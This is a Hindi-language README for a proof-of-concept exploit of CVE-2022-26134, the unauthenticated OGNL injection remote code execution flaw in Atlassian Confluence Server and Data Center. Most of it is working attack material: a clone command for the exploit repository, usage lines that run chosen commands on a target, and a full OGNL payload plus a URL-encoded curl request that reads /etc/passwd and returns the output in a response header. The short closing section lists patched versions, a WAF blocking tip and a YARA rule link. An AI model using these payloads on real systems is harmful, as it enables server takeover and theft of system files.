
CVE-2022-26134 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Atlassian Confluence Server और Data Center में एक बिना प्रमाणीकरण वाली OGNL इंजेक्शन भेद्यता है, जो रिमोट कोड निष्पादन को सक्षम बनाता है।
स्क्रिप्ट प्रूफ ऑफ कॉन्सेप्ट जो Atlassian Confluence 7.18 और उससे निचले उत्पादों को प्रभावित करने वाली रिमोट कोड एक्ज़ीक्यूशन भेद्यता का शोषण करती है। OGNL इंजेक्शन भेद्यता एक अप्रमाणित उपयोगकर्ता को Confluence Server या Data Center इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देती है।
Confluence Server और Data Center के सभी समर्थित संस्करण प्रभावित हैं।
Confluence Server और Data Center के संस्करण 1.3.0 के बाद और 7.18.1 से नीचे प्रभावित हैं।
इस भेद्यता का CVSS स्कोर गंभीरता के लिए 10 में से 10 है।
रिपॉजिटरी को क्लोन करें
git clone https://gitlab.com/Naqwada/cve-2022-26134
cd CVE-2022-26134
फिर आप अपनी पसंद के कमांड के साथ एक्सप्लॉइट को इस प्रकार चला सकते हैं:
python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
CURL कमांड के साथ उदाहरण:
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
फिर, कमांड का परिणाम रिस्पॉन्स हेडर में पैरामीटर X-Cmd-Response में दिखाई देगा।
Atlassian से आधिकारिक सिफारिशों का पालन करें:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Atlassian ने संस्करण 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 और 7.18.1 जारी किए हैं जिनमें इस समस्या के लिए पैच शामिल है।
यह भेद्यता सभी स्व-होस्टेड इंस्टेंस को प्रभावित करती है। यदि आप WAF का उपयोग करते हैं तो आप अंदर ${ वाले URL को ब्लॉक कर सकते हैं।
YARA (by Volexity): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar
केवल शैक्षिक उद्देश्य के लिए।
